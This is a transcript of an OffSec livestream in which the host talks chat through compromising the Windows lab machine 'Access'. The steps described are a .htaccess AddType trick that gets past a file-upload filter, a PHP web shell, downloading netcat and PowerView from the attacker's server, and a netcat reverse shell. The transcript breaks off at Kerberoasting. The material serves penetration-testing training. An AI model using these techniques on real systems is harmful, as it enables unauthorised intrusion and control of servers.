You guys can hear me clearly now, right? Yeah. ARE223 says that is fine. Jester Juco says voice sounds good now. Excellent, guys. We're rocking and rolling. We got that teamwork happening. I'm happy it's Friday. I mean, happy Friday to everybody else. How are you guys doing? Did you guys have a good work week? Was it busy, stressful, anything like that? Anything? I don't know. It wasn't so stressful for me. It was just busy, busy, busy. I had a lot of projects going on, things I'm doing, personally at least. But other than that, if you are watching this on YouTube, go ahead and skip to the 30-minute mark. I may just actually end up clipping all of this and starting at the 30-minute mark. That way, people can just jump straight into the machine. Until then, if you'd like to, sit down, tell your friends that Offensive Security is live because we're doing a special machine today. We're doing a PG practice machine called Access, which is super sick. It's a Windows machine, so that's going to be fun for sure. And yeah, if you have anything you want to talk about, I'm here. And we'll try and carry this conversation for like the next 30 minutes or so. A bit tired. Had to take a vitamin B12, but I think we'll get through it. It's fine. Finding bugs, ARE, that's good. Sometimes you gotta get down to business to defeat the Huns and find those bugs. Because that's the name of the game, bud. Absolutely. Absolutely. Let's see. Only about 16 people here right now. Usually we'll get about 100 people or so when we... will you be at the Packet Hacking Village this year, S1REN? No, man. Just due to some financial reasons, I won't be able to make it to DEF CON this year. I do apologize. I've informed Riverside and the rest of the team at the PHV or Packet Hacking Village that I won't be able to assist with the setup or get anything cool on a projector or anything like that, but I'll be there in heart. If you're hearing me from the PHV, I'm with you in heart, and I hope you guys have nothing but an amazing time. And that'll be a blast there at the PHV for sure. PHV is always where the party's at, man. That's where the party's at. No joke. But no, unfortunately, I will not be making it to that this year. Just a financial thing. So, let's see. Are you going, Jester Juco? Are you planning on going to DEF CON this year? What's the status? What's the status, apparatus? Let me pop out the chat here. There we go. See, now I can pop out the chat. Excellent. And I can enlarge in it. Oh, you are going. Excellent. Excellent, excellent. You wanted to participate in some CTFs? Keep learning? Okay. That's what it's all about, dude. All about it. Enjoy those CTFs. Shout outs to the Red Team Hacking Village over at DEF CON. Shout outs to them for sure. Shout outs to them. Shout outs to the PHV. Shout outs to the Car Hacking Village. Shout outs to all the gizmos and gadgets and gadgeteers that put on all their funky hats, their pineapples, all their Raspberry Pis and rubber duckies and all that cool stuff, all the LCD screens. It's going to be a blast, no joke. I wish I could go, but fortunately it's just not going to work out for me. Aside from that, we got about 20 minutes on the clock, 22 minutes. Guys, make sure you head over to portal.offensivesecurity, or actually it would be portal.offsec. I'll put that in the chat. HTTPS portal.offsec.com. And what you want to do is you want to log in, connect to the VPN, and just kind of launched the machine called Access from PG Practice. My cat is here with me, telling me he loves me. He's the best, dude. I'm so you know what? You're the best, Cosmos. You are the best. Love you, buddy. Okay. Let's see. Ba-ba-ba-ba. Anybody else have anything they'd like to talk about? How many people and viewers do we have right now? We are currently at about 24 viewers. Not bad, not bad, not bad at all. But a little low for the viewership right now, as I said. It'll be a little later and they'll trickle in. Hey Siren, hey everyone, says Just a Guy 1 through 7. Welcome back, Just a Guy. Welcome back. Welcome back, welcome back. And yeah. Welcome back. If you have a PG Practice subscription, Just a Guy, head over to portal.offsec.com. And is this current box more OSCP or Web 200? OSCP. This is more of an OSCP machine, for sure. More OSCP than Web 200. Absolutely. Got it. Thank you. You're totally welcome, my friend. You're totally welcome. Absolutely. Absolutely. All right. So if you just jumped into science and technology and you found OffSec and you see this glitchy stream and we're like, the path to a secure future, what's that all about? At Offensive Security, or at OffSec, as we've recently rebranded, it's the path to a secure future. We provide and believe very much in proactive measures. The vast majority of our certifications, courses, are catered around proactive and offensive related security. So basically, kind of like ethical hacking. We have a numerous amount of certifications that you can check out at offsec.com. If you're not interested in that just yet, that's okay. Check out this stream and sit back. You don't have to follow along even. Just see if it's something you might be interested in. If you're new to cybersecurity in general, we also have some kind of defensive stuff as well. That is what we call a SOC, or SOC engineering. Kind of some blue team stuff going on. And very excited about that because, lots of potential there. Lots of potential. And the buffering screen. Which buffering? I hope it's not buffering. It's not buffering for me. ARE, what is that? Yeah, ARE223. ARE223. Starting in about 18 minutes, guys. 18 minutes to go ahead and boot up the machine. That is Access. I'll put it in the chat. We are working on ACCESS. Oh, you like the animation. Yeah, pretty sick. Shout outs to our graphics designers here at Offensive Security. And then I kind of just took my own render on it. And I rendered out the glitchy effect and so on and so forth, and pulled it all together. All his graphics I kind of took together in Photoshop and then made sure that it all gelled once I was done with the raster. But once the raster was done, then we were good to go. Glad you enjoyed it. Thank you for the compliments, and shout out to you. You know who you are at OffSec. Amazing graphical work from you, my friend. First time chat. It's Nasu says, hello, Siren. Hello, Nasu. Nasu, good to see you, my friend. Good to see you. Welcome to the chat. If you're interested in actually hacking with us today, man, go on over to portal.offsec.com, log in, hit the PG practice button, download the VPN, then you're going to open VPN --config universal.ovpn and launch the machine called Access. Think you'll enjoy it. Think you'll enjoy it for sure. But welcome to the stream, Nasu. It's good to have you. Let your friends know that we are live and we're getting ready to rock and roll here. And just about T-minus 17 minutes. 17 minutes or so. If you guys have any questions, comments, concerns, the like, please let me know. Please let me know. I'm open to discussion in these 30 minutes. We got to keep it going, not keep it quiet. So, I mean, I can go quiet. It's just going to be... It's going to be super boring. It would be super boring if I was quiet. It's probably super boring right now. Not much going on. Oh my God. My cat, he never does this. He just put his paw on top of my foot. And he's laying on it. I love him so much. No questions today, ARE223? Okay, that's totally fine. No frown faces, man. No frown faces. Kind of like that streamer Dr. Disrespect says, we're at the tippity top of the mountain, but we're really only halfway there. Because when you think about it, what goes beyond the mountain? Outer space, my friend. Outer space. Tippity top of the mountain, but really, we're only halfway there. We're always going up. Always staying positive. Jester Juco, when going to DEF CON, do you think following one thing and sticking with it is better or trying lots of things? Oh my God, dude. So this question is great. I think if you're a casual person that's just going to DEF CON, dude, get into everything. Go out with your friends to get some food. Go out, and check out Vegas. Go to like Area 15. Oh my God, so much fun. Shout outs to the guys that made Area 15. You know who you are. We had an absolute blast that night. And they even got this incredible bar arcade kind of tucked away, hidden in the back. Make sure you check out Area 15 if you're going to Vegas. First time on live, I watched all the replays and I love it. Unfortunately, I'm on the bus to go to France and complicated to hack. No problem, Nasu. Safe ride to France. Enjoy it. It's probably a bumpy ride, but, enjoy it. Just kind of vibing. We're just kind of vibing. But as far as DEF CON goes, man, if you're first time or whatever, make sure you hit up all those villages, dude. Hit up all those villages. I have a lot of friends at DEF CON, so I like volunteer to help and so on and so forth. Yeah, man, we're totally chill right now. ARE has it. We're just vibing. We are absolutely just vibing right now. And it's a Friday. I mean, dude, we're going into the weekend. It's going to be awesome. It's going to be awesome. And let's see here. Anything else going on in the chat? Not really. Chat. That's right. And we also have about 39 viewers now. Welcome to OffSec stream. Portal. .offsec.com. Log in, download the VPN, connect, and then you're good to go. Just hit the start button on Access and PG Practice if you have access to PG Practice. If not, then do not worry about it. Don't even fret. It's okay. We're going to be doing it here together, and as a community, we're going to have those vectors, and we're going to kind of just be rocking and rolling, man, without question. Actually reminds me, I need to get a template set up here so I'm not going in blind. Call this template access, set it to bold, and drag that up here, paste my template in. Let me go ahead and actually add this in Discord. Let me add this in Discord. I'm actually gonna have this here and this here, and we'll start calling this the 2-try list. 2-try list. That's what it is after all, just the 2-try list. And then if you'd like to follow along, man, absolutely check out, dude, just check out the general chat. Illuminate us, S1REN. I love it. That's really funny. There is the kind of the sheet that we're going to use. That's my just enumeration template. If you're interested in any of the commands that I perform or whatever, you can check out my blog. I think I'm allowed to show that because I put it up for student resources. I put it up for you guys. I made it for you guys. It's at sirensecurity.io. And feel free to check that out anytime. But we got a first-time chat from Simba Screams saying, "Hey, S1REN, and what's up, chat? Nothing much, just chilling like a villain." And that is what we are doing, Simba Screams. That is what we are doing. Invite your friends. Let them know we're going live in 10 minutes. T-minus 10 minutes, my friends. And then we are going live. In fact, let me go ahead and export. I'm going to do my part now. I'm going to go ahead and export the IP address. Let me show you what I mean. I'm actually going to temporarily go live for a second. Even if I end up cutting this, that's okay. The point is we export the IP, right? We export a URL to equal HTTP. Just want to show you a little bit about what goes on behind the scenes. And I export down in this one, export my IP and export my URL. This one would be usually I set it up for directory busting if it's present. So I go ahead and just add that trailing forward slash. But let's go back here. Thank you. Glad you liked the terminal. Absolutely, absolutely. ARE223. It's my 6th or 7th time with S1REN on stream. Dude, absolute regular, and we are happy to have them back. Thank you, ARE, for being here. Thank you to everyone else who's a regular for being here. Lady Juliet, absolutely giving the high five emoji or a wave emoji with a suck. Is that a wrench or celery? I can't tell. But Lady Juliet, welcome to the stream. If you're not sure what we're doing, we're just going to be hacking a machine called Access. We're going to be hacking a computer called Access. It's a Windows box. And if that intimidates you, then do not let it intimidate you because we're doing it as a community. We're doing it together. And even if you don't have any input whatsoever, then that's okay. You can at least sit back, relax, enjoy the show. You know what I mean? Sit back, relax, and enjoy the show. Yeah, IP and $URL, $IP, $URL. You got it. You got it. You got this. Oh, stretching up there. Sorry for that sigh. But yeah, make sure you wrap it in quotes. Always wrap your environment variables in quotes. That way, they won't be, when you type env, the quotes won't be there, but that way strings don't get, no delimiters get kind of popped off the line there, off the command line landmine. You always want to keep those double quotes up. I've recently been diagnosed with parentheses paralysis and severe hostility against Vim users. Of course, that's not a real disorder or a real disease. The real disease is Vim. But I'm kidding. It's a joke. Check it out on YouTube. This guy is doing amazing videos talking about Emacs and such. But I see we got some laughing going on. I'm here to help. I like to crack jokes, man. I'll crack a joke all day long. Absolutely. Absolutely. Oh, oh man. What a time to be alive. What a time to be alive. Dude, I love Nano. I love Nano and Nano if we're talking real, yeah, I use Nano. You tested positive for Viet Vim? My friend, I'm so sorry. I'm so sorry. Emacs. Emacs is the way to go. Emacs. I'm kidding. Vim is amazing. Vim is absolutely nothing short of incredible. That's not a bad thing to be diagnosed with. Hey, second time watcher from TX45N. I remember TX. Welcome, TX. Welcome, welcome. Second time watcher. All hail to Vim. What sort of level is tonight's watch out of interest? I do not understand that English, but I think you're talking about what we're doing. We're doing access? Yes, we're doing access on Proving Grounds practice. And first time chat from random_3 says, Hey, S1REN, how did you find mentors when you started? How did you develop the relationship? I'm going to be honest with you, man. I took anything and everything I got from any and everybody, like the community forums. Nowadays, we got channels in Discord, and that was how I did it. I didn't have videos with people demonstrating how to hack live. Does anybody have the link to the playlist? If someone wants to be a hero right now, with the few minutes on the clock, 5 that we got left, go to the OffSec YouTube channel, go to playlists, and grab it. That'd be great for everyone else because that's where this is going to be uploaded to. Make sure you subscribe on the YouTube channel, smash the bell. You'll get notified whenever these videos go up. But to readdress that, right? How did I develop that kind of relationship? I didn't. I had like one student mentor who was a pretty cool friend, Alex Ertek. Shout outs to you, my friend Conquistador from Chile. Absolute shout outs to you. Really inspired me to step into this field and take it seriously. So thank you very much. And good job there on the link. Make sure you check out machine walkthroughs on that playlist and do nothing short of bookmark it. Bookmark it, put it on your bookmarks bar, because if you're learning, it's the most invaluable resource that I can think of for any of this stuff. When I was going through getting my OSCP back in 2018, there were no videos. There was no hand holding in any way, shape or form. There was no nudging in any way, shape, or form. There was no hack tricks. There was no GTFO bins. I had nothing but a lot of bookmarks from blogs and articles and configuration stuff. That's what I had. So I really can't stress enough how nice it is to be able to have these kinds of things and to now be the person for OffSec that's providing this methodology and providing it to everybody. We are so happy that you guys are here because, like I've said 1,000 times before, you guys are the heartbeat of this organization, and think nothing less because that is the truth. So let's go up here, and I'm gonna check the time. It is 2:56, so 4 more minutes, 3 to 4 more minutes, and we'll go live. 14 bookmarks of cheat sheets. What I would have given, my friend, what I would have given. I had to make my own. And I'm grateful that I did because it forced me to try harder. And now I fly off the command line, absolutely fly off of it, and like an eagle, just absolutely soaring. The Phantasmo says, I remember those days with OffSec. I like how it is now. Man, that stuff is like a gateway to the past. Like, those days with OffSec in the past, I like how it was back then if we're going through that gateway. I like how it was back then, And if we're coming back through the gateway, I do like how it is now. 18 cheat sheets. Caramba. Incredible. Wow. Increíble. My Spanglish is atrocious. I'm sorry to anybody from Barranquilla, Colombia. I was not raised to learn. That's part of my heritage is Barranquilla, Colombia. And but part of it is Italian as well. So you can maybe hear the Italian in my voice. You can maybe hear, a little bit of the Hispanic side of things. And it all just kind of makes sense, doesn't it? I just see you working on terminal only, somehow IQ 200. An IQ of 200. I don't know, man. I'm always learning. I'm always doing the best that I can. Yeah, always learning. Always doing the best that I can. TikTok. You're on the clock. 2:59 p.m. Give it all you got. Dun, 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 dun. I like pizza and sangria. These are good things. Mooncake 5000 says, "Oh my God, it is S1REN." Simba Scream says, "Oh my God, it is S1REN." And Andy comes in with, "Hello, hackers." Hello. Reminds me of the Book of the Mormon. Ding dong. Hello. My name is Elder Price. Hello. All right. Funny. All right. I like to be funny. Yo, absolutely, dude. Absolutely. But guess what? It is 3 p.m. and we're going to get down to business now to defeat these Huns that we keep talking about. So I am going to set to streaming. I'm going to lower this down a little bit. We're going to clear. You're going to see that I have vulnerabilities. So any vulnerabilities we come across are going to go in there. Any files and exfiltrated information from this target machine is going in here. Any users we enumerate go here. Passwords here. Hashes here. And let's do an nmap. Nmap -p- to cover all 65,535 ports because we want to be compliant. It's a PCI compliance test. We have to have all those ports, man. All those ports. -SV service version. That's basically the equivalent of like netcat -net verbose to the IP on, some port, right? Basically the same thing. It's a banner grab and an attempt to grab a service version. And -SC is going to be simple scripts, so we'll be running simple scripts against this. Aside from that, we're going to be hitting up the target IP and tac open because I don't want to scan and spend all of this time on every port. Like, do you know how long it would take if I didn't add --open? Look at this. It would take quite a while. So what we're going to do is tack on --open. And that way, any ports that it comes across, see, now it's just going much faster. And we're kicking butt. We're kicking butt. And yeah. Hello, S1REN. Just passed my OSCP with a passing score of 90 out of 100. Says Fire Raid 001. Hello, S1REN. Just passed my OSCP with a passing score of 90 out of 100 last Saturday. Thank you very much. I had a lot of changes in my methodology and tools. Thanks to you. Heart, shout outs, and everybody clap for Fire Raid. Congratulations on now being an offensive security or OffSec certified professional, my friend. Certified professional. Welcome to the club, the cool club. Good job. Yep. Claps in the chat. Clap emojis in the chat. Heck yeah. That is an achievement of a lifetime. An achievement of a lifetime. And it is also a certification for life. You will now be considered an OSCP forever. No worries. No need to renew all of this stuff. You're good. You are good. And an amazing score. Congratulations. So checking the Nmap scan here, 83, 84%. You know, we're doing it. We are doing it. Yeah, lots of congratulations in the chat. Mucho importante. Absolutely, Akush. Absolutely. Mucho importante. Nothing just yet mucho importante, but we will have something. We will have something very important in this on this machine. On this machine. Let me crack my back. It has been a week, man. It's been so long of a week, I am cracking my back. UDP scan, worth it or not? No comment at the current time. UDP scans can take an entire day on a single machine, yet alone if you have to cover a Class C. I would say speak with your stakeholders and clients to know, what UDP ports might be running in advance. That way you can check for it with host discovery and it doesn't take as long. That's just generally the way we would do things. Like network time protocol or NTP, for example. Man, this must be a massive machine. Holy crap, this must be a massive machine. This is taking a while, even with -- open. Even with -- open. Come on, baby, let's go. Whenever I hear Siren's voice, I pull out her wonderful blog at sirensecurity.io. Thank you. Thank you very much. Appreciate that. So let's just jog all of this into Cherry Tree. Copy that. Move to Cherry Tree. Paste it under our Nmap results. We set the background color so it becomes visible just in case we have a lot of information. And we're going to start highlighting the ports and the services. That way things stand out a little bit more. 135, 139. Looks like, oh no, did I just... Oh, phew. Okay. Wrong button. Let me bring this over too so we get more clarity. Bring that up a little bit. And a little down. There we go. We're good. 445, 464 looks like a little bit of Kerberos, NCA-CN, HTTP, a TCP wrap on 636, LDAP, another TCP wrap, 5985 facing HTTP, 9389, that's MCNMF, or the .NET Messaging Framework. Lots of MS RPC. When I see MS RPC and NCACN HTTP, I'm thinking evil WinRM out of the gate. That's what I'm thinking. That kind of stuff comes to mind because it's going to be using that HTTP RPC to be able to gain exec and such. But that's an oversimplification. We have simple DNS plus, so pretty nice there. We also know that we're working on a Windows x64 operating system. As far as anything else goes, port 80 looks like Apache and PHP 8.0.7, so that's our web technology. Very nice. Excellent enumeration there. We got all that back, very nice. Potentially risky method of trace. I'm going to leave that be. I'm seeing keywords stand out like Kerberos, Active Directory, LDAP, on access.offsec, more access.offsec, and more Active Directory LDAP, HTTP API, and what else am I noticing? .NET Messaging Framework, pretty standard, but I am going to highlight this. RPC over HTTP, remote procedure call over HTTP. As far as Samba came back, with the Samba dance, we have SMB2, but security mode is 3.1.1, and message signing enabled and required. So I'm going to go ahead and drop this, move that up, make that nice and clean, and we're going to have some ports up here. Let's go ahead and add 80 up at the top. Obviously, 80 is the largest attack surface in the world. And that is my specialty. Other than that, though, we also have 135. So 135 MSRPC, and we also have 139. I'm actually going to move these up in priority. 139445 SMB or net bias SSN. And, we'll do some highlighting here to make sure things stand out. What else are you guys thinking? What are you seeing here? What's some low-hanging fruit? I'm actually going to drop 135. I'm seeing 445, 464, Kerberos or K-password. We could put that down as 464, K-PASSWD. So we know we got some Kerberos, perhaps? Maybe that's the vector into this machine. Do not know just yet. Some TCP wrap stuff on 636. I mean, a TCP wrap could be anything. I know from experience that 3269 and 636 always come back as TCP wrap. But whenever you see TCP wrapped in a live DMZ zone, man, someone could have left behind an NT shell, and it would come back as TCP wrapped. How do I know? Because that's the way it was. Someone trolled me back in the DMZ for domain and left behind a shell. 389 LDAP. Obviously, we want to put that down. Good suggestion. Just a guy. 1 through 7. 389 LDAP. So straight up. First things first. Let's go ahead and take down the 2-try list. So what do we want to do with 80? Largest attack surface in the world. HTTP. What do we want to do, guys? What is our attack vector? Our attack vector here. Fuzzing. I like it. We're getting better, guys. You're definitely getting it. Directory and file discovery / fuzzing. Absolutely. What else? What else can we look for? What about manual inspection? View the source, Luke. View the source. And what else can we talk about here? What are we looking at? I mean, that can't be all, is it? What about robots? Robots.txt, .svn entries. What about .ds stores that might contain some strings that should not be there? What else are we looking at, guys? What else might we do? I think that's a pretty good start. I think it is. And yeah, I'll leave it there for now. Separate this out a little bit. Add some spacing. I'll save that in case it crashes or something. And I need to grab my IP address from the portal. And we'll right click copy. I'm going to bring that over. And at the top, I'm going to include this up here. I'm going to paste it. Can I paste it as plain text? There we go. And the host name is access. All right. Now we're cooking. So I've got Burp Suite open, and I've got a browser open. I think we're just going to hit up 80, and we're going to see what's going on. The event. Home about. So definitely something that's... Is this in development? No, it looks like it's kind of finished. I mean, what if I click something? Hotels? Okay. Some pseudo data here. In focus. Strider. Ceph. All this cool stuff. Standard access. Buy tickets. I do not speak that language, so I do not know what that says. Atlantis VCH says, I haven't heard about S1REN before. She's amazing. Keep inspiring us. I will do so until the end, my friend. Until the end. Maybe. Okay, so Mousesure is already on 80, and he, she, they is saying buy tickets. Okay, buy now. And what else are you saying? Database behind SQLi. Let's try for SQLi here. Standard access. Pro access. I don't know. Purchase. An error occurred. Please contact the administrator. So maybe there's some SQL injection there. Um, perhaps. That would be blind SQL injection if we found it. Um, what about uploading an image? Um, let's put down what we have thus far. We found a buy tickets. We can buy tickets, checking for various web findings. What else do we see here? Upload image upload, check for unfiltered upload. I agree. I actually agree with you. We can try a file upload attack, which you have if you have access to Offensive Security's OLL or OffSec library. Then you can check out one of my new modules. Actually, just finished it. File upload attacks. So this is right up that alley. If you're interested in that one I wrote, and if you're interested in credential attacks, go check that one out as well. There are numerous other ones from other teams that are out there as well, and you should definitely check them out if you have access. But file upload attacks and credential attacks are on OLL, and they're live now. That's all public info. But aside from that, let's go to transfers. PHP is the web technology. Now let's see if we can do something like I'm gonna intercept this in Burp. I'm gonna intercept this in Burp Suite. Let's just see what happens if we try to upload a PHP, cmd.php, purchase. And let's go to intercept and see what's going on here. Okay, so we have a multi-part encode kind of data transport over post method. And it looks like we have your name, your email, ticket type, the file, cmd.php, submit type equals purchase. Let's close this so we can get that there. And forward. The file extension is not allowed. So, yes, this is being recorded and this will be available on YouTube. But there might be something we can do. If I nano home Kali transfers PHP cmd.php, right? We might be able to fool it into thinking that that it's like a GIF. So let's try that. It says image, and what we'll do is try and do a bypass and see if that works. Let's turn off intercept. Forward out all the remaining traffic. There it goes. Buy tickets. Buy now. And let's choose, well, yeah, it would be cmd.php, right? That would be under my recent. Made a bunch of screenshots. Let's do cmd.php. And I'm going to actually intercept this. And let's hit purchase. Go back to Burp Suite, and this time I'm going to say like .gif.php, and I'm going to set this to image GIF, and we have GIF98A. Can we fool it? Can we fool it into thinking that it's a GIF? This is a file extension is not allowed. Dang. So they really are checking this. Are we out of options? Oh, let me stretch. Are we out of options? No. Can I show you maybe a trick? Maybe you guys will let me show you something else that you can do with file upload attacks that you may not have been aware of. And my fingers are crossed that this even works. But if we go back to access this event, buy tickets, what we can do in essence is, let's say, let me cd to transfers. And I don't know, we'll make dir stream, cd stream. What I can do is essentially touch a .htaccess file. They might have blocklisted images. They might have blocklisted code. But did they blocklist an htaccess file? I don't know. Let's nano the htaccess file. Here's a little souvenir for you. So what we'll do is we'll type add type. I mean, I know you guys, you're like, go on, get to it. Okay, add type, application / x httpd php. And then we'll set that to not PHP. We'll set that to dot evil. How about that? Dot evil. And then let's try and upload that. Is intercept off? Yeah, it is. We're cool. We're cool. We're cool. We're vibing. Everyone's having a good time. Sounds evil. I would never be evil. I would never, ever, ever be evil. S1REN would never be evil. Let's go to transfers, and I think we called it stream.htaccess. All right, purchase. Okay. You will shortly receive payment link mail. That's a different message. That's a different message by attempting to upload a .htaccess. This actually brings something to mind. If I type out common, we need to do discovery. Guys, we need to do discovery because if we uploaded that htaccess, my question is, where in the crap is it? Where is it? Where is that thing? So I am going to use wfuzz, and that's just dash color, file input method. We're using seclist, discovery, web content, raf large files.text. It's like GoBuster. --HC 404 because we don't want 404 responses. I don't want 100,000 or 37,050 404 responses. And that's at the target URL. But let's go ahead and do that. And then let's also fuzz for words. So anything like any endpoints kind of a thing. And we'll do the same thing down here. It's the same exact thing, just changing the word list. Raft large words.text. And let's see what we get. What we're looking is like for files, F /data /upload. Hey, there it is. PHP my admin. Okay, so we're getting stuff back, man. I'm going to let this go mad traffic for like the next 20 seconds. And we're going to see if we can't get some stuff. Examples. Ooh la la. Maybe a do.action. Struts. I don't know. Starting to get to the duplicates now, but we can let things go there. We have about an index.html, tickets.php, which is good. So I'm going to put that over here, that under files on port 80, with regards to port 80. Port 80 files on /, we found index.html and tickets.php. With regards to 80 directories on /, we found CGI bin. I like doing it manually. That way I can keep it running in case any pop up. It's just an old habit, the technique that I developed. We have / uploads, of course. And we have assets, forms. Webalizer is a 403, so no. PHP my admin is a 403 as well, but we'll put it down. PHP my admin, we can still do some trickery. We'll put both of these down in case we could change up the Apache config file at any point in time. Then we can set our user agent to be special and view those things as if we were local. We also have that .htaccess. Everything else is kind of null here. I'm going to go ahead and cancel this, and it looks like we're looking good. I don't know what else to say. So as a recap, we managed to find an upload vulnerability with a .htaccess. We're going to say .htaccess upload vulnerability, and it contained essentially add type. So we weren't able to upload PHP, so we added application x-httpd and -php, and now we make up our own extension. We just called it .evil, and that's the contents of the HT access. So the question is, great, fantastic, we were able to upload it, but dude, where did it go? Where did it go? We found an uploads directory. And maybe, just maybe, wherever it went affected the uploads directory. So now we're going to let's do this. We're going to go back to our stream directory here, and we're going to touch I don't know, OffSec, we could say siren.evil. We'll touch siren.evil. We'll nano siren.evil, and we'll put this in preservative statements, and then we'll put PHP tags in here, right? Because this is just a basic web shell, guys. There's nothing fancy going on here. We're calling a system $_get. So whatever comes out to CMD, that's what gets executed, right? That's what gets executed. And notice it's .evil and not .php. Now if we go to buy tickets and we go to buy now, AA, standard access, premium access, choose file, and we'll go to transfers, stream.ht, not .ht access, excuse me, transfers, stream, siren.evil, fingers crossed, man, purchase. Yes! Okay, so it totally worked, right? It totally worked. The question is, where did it get placed? Did it get placed in actual file? Did it get placed here? Yes! Man. Does anybody see this right now? Anybody? Siren.evil. Heck yeah. Now we're going to type on $CMD is equal to dir. Dude. Can we curl this can we just curl this? Oh my god. We have a web shell, guys. Is everybody, hats off, dear. Thank you. Lady Juliet, thank you. Rev shell that bad boy? Yeah, now this is a Windows machine, everybody. This is a Windows machine. Who am I? We are access SVC Apache. Service_Apache. So that's bling, dude. I don't know what else to say, like task list. Here's all the tasks running on the machine, which is pretty sick. Can I do who am I %20 /priv? Oh, we're going to have a blast, I think. I think we're going to have an absolute blast. So here's what I'm going to do. I'm going to cd into my files directory. And what I'm going to do is locate nc.exe. I'm going to copy this over and copy nc.exe from my transfers directory to this directory. There's netcat. See? It's chilling. And what we're going to do is start up a simple HTTP server. This is effectively saying if I cat my bash rc and grep-i for, simple HTTP, you'll see that it is an alias ifconfig on ton0 and we grep inet, and then we launch python-m simple http.server. So I just type simple HTTP and tab it out, and we're serving, and I have my IP. What this means is that I can go back to the browser, and assuming the machine, does it have curl? Can I curl? What's my IP address, right? Curl HTTP this port 80 / nope. That didn't go through. What about port 8000? Maybe I could get the port correct. Yes. Okay. So now we have file transfer capability as well. We have file correct, TX. Port 8000, not port 80. We got it. And no, it is not potato time, man. You guys think I'm going to bring out a machine and we're just going to be dropping a potato? This is OffSec, fam. We look for those misconfigurations. We look for that really, really, really finesse kind of finesse. So what we're going to do is, now potatoes are a solution sometimes. I love potatoes. I like fries. I like fried potatoes. I like loaded potatoes with sour cream, and I love potatoes with cheese. I like cheese fries. I don't know what else to say. Potatoes are great, but that's not the way we're going. So what we're going to do is transfer over netcat. So nc.exe. See how I did that? Curl, and then HTTP port 8000, nc.exe, and then we're going to -o. Now this is Windows. I can't just say I guess I might be able to, but let's be correct syntactually. /nc.exe. And did it get it? It got it. It was a code 200. And now if we type directory, there's netcat. Netcat is in the directory. So now let's do a curl, and this time, actually, no, we're going to say netcat.\nc.exe. And can we see siren.evil? Heck yeah, dude. Cat home, Kali, transfers, stream, and then it was siren.evil. This is siren.evil. And what you're also looking for here, man, is .htaccess. Notice how we added our own type to be able to bypass this file upload restriction with a .htaccess. And we named it .evil. No problem, man. If anybody else needs a recap, please let me know. I'm here to rewind all the time. So what we're going to do is netcat, and let me grab my IP. You guys know what time it is already. We're going to nc-nlvp on 9090 because that's the port we cruise on around here. I'm going to netcat to my IP on port 9090-execute cmd.exe, and all things considered, should I hit it? Is this going to work? I don't know. What do you guys think? Do I hit the return key? Is that what we do? Think so? YOLO, I agree. And we have a shell. Yes! Success! Jinx! Just a guy 1 through 7. Success indeed. Success indeed. Let me just see here. And what we're going to do is see here. Let me pull back up the chat. Sorry, I got a message there. But what we're going to do, that's bling bling. That's a shell. We got it. We have landed. Directory, we're in XAMPP. There's our netcat. There's our nc.exe. We have done it. We have absolutely done it. It's looking good. Now, similar to what we did, or what we do with Linux machines, sudo-l. That's right, like Dr. Disrespect says, man, biggest streamer on Twitch. We're at the top of the mountain, but we're really only halfway there. We are really only halfway there. So, who am I /priv? Jeff already knows. What is the equivalent on Windows? That's going to be who am I /priv. Okay? And set change notify is enabled. Set create global privilege is enabled. Yikes. But what we're going to do now is actually locate something called power view. powerview.ps1. I'm going to clear that. I'm going to copy that. Actually, let's cd to our files directory. pwd, there I am. And I'm going to copy powerview.ps1 here. And what we're going to do is curl http. Let's grab our IP if config on ton O, ton 0, and on port 8000, we're going to serve that with a simple http / what? powerview.ps1 space dash output as dot / powerview.ps1. PowerView, we love PowerView. I love PowerView. Siren, question about that .htaccess file. Where was it uploaded? So it was probably uploaded, well, here. You see? There's the htaccess file. And that is in xampp htdocs. That's public. Anything past this is public. / uploads and then htaccess. You're asking why didn't it appear here? I know what you're thinking. I know what you're thinking. Let me show. I know what you're thinking. I know exactly what you're thinking. Why isn't it here? Why don't we see .htaccess here? Because Apache will hide the .htaccess file. But if we specify .htaccess, you'll see it's forbidden. It's there, it's just forbidden. It's hidden, forbidden. Hidden and forbidden. Hope that makes sense. Hope that makes sense. So with that being said, we've gone ahead and got PowerView, right? For hidden. I like that, but forbidden and hidden. Get powerview.ps1 code 200. Dude, that means we had a successful transfer. And that is kind of what we're looking for here. So what I'm going to do is I'm going to let's just do net users while I'm here. What users do we have on this machine? So we have a MySQL user, SVC MSSQL, net user SVC MSSQL. Part of domain users. Okay, excellent. That could be actually net users. Is there default user on here? No, default user is not present. I was going to say that could be a different thing. Shout outs to, well, you know who you are. But nonetheless, let's see. So we have SVC MySQL. We're looking, let me make this clear. We're looking to go up vertically to NT system authority or to an administrator, right? Right now, we're not. If I do net user SVC Apache, it's still just a member of domain users, right? There's no administrative group. There's no special group policies that are being applied. Nothing like that. Thank you for linking the playlist there, Simba. First time chat from Himsflash says, first live at S1REN, feeling amazed. Amazed. God, that's what I'm talking about. That's what I'm talking about. So, dir-a-o-q. I want that full directory. I want that power dir-a-o-q. And we have our htaccess, our netcat, our powerview, our siren.evil. And guys, what we're going to do now is drop into PowerShell. We're going to drop into PowerShell. And inside of PowerShell, we're going to import. We're going to do import module /powerview.ps1. And that should go through with no errors. And what we're going to do with PowerView is kind of get more information on this SVC MSSQL user. It's lowest hanging fruit. It's the only other user on the machine. It deals with the database, and we might be able to play with it, quite frankly. So let's do what was it? Get PO. No, that was the previous machine. This would be like get net user. Yeah, we're looking for net user SVC. So you know how we typed net user? Now let's do it with PowerView. Get net user, and then we'll see SVC, so service MS SQL. Boom. I don't think there's any problem with PowerView at all because I don't think PowerView does any direct exploitation. PowerView is a way of viewing information. It doesn't do any logic for us. Does that make sense? So yeah, dude, we totally allow PowerView. Become familiar with PowerView. Imagine PowerView as your Swiss Army knife, your netcat.exe of Windows. Become extremely familiar with its enumeration capabilities. Become extremely familiar with how you can use it for privilege escalation. Make notes of these things. Have these notes localized on your machine. Be ready. Be ready, because it is allowed on the exam. Nonetheless, can anybody tell me what stands out here? Anybody at all? Anybody? MySQL, yeah. I mean, I like what we see here. I like it. So basically, the account that we have here is configured with something called a service principal name, or an SPN. Okay? Can anybody tell me? Oh, I see the all cap. Oh, snaps. And chat. I'm seeing it now. Yes. Now, what do we think when we see a service principal name? Kerber roasting. And if we go back to our Nmap scan, what's on this machine? Boom. Boo. Now, let's get over here with that service principal name, and what we're going to actually end up doing. Basically, if you're thinking of Kerber roasting, what comes to mind? What do we need when we're doing a Kerber roasting attack? What is the one thing that we always need to get, that we're always looking for? Can anybody tell me? Has anybody experienced this in the past? Domain user cred, 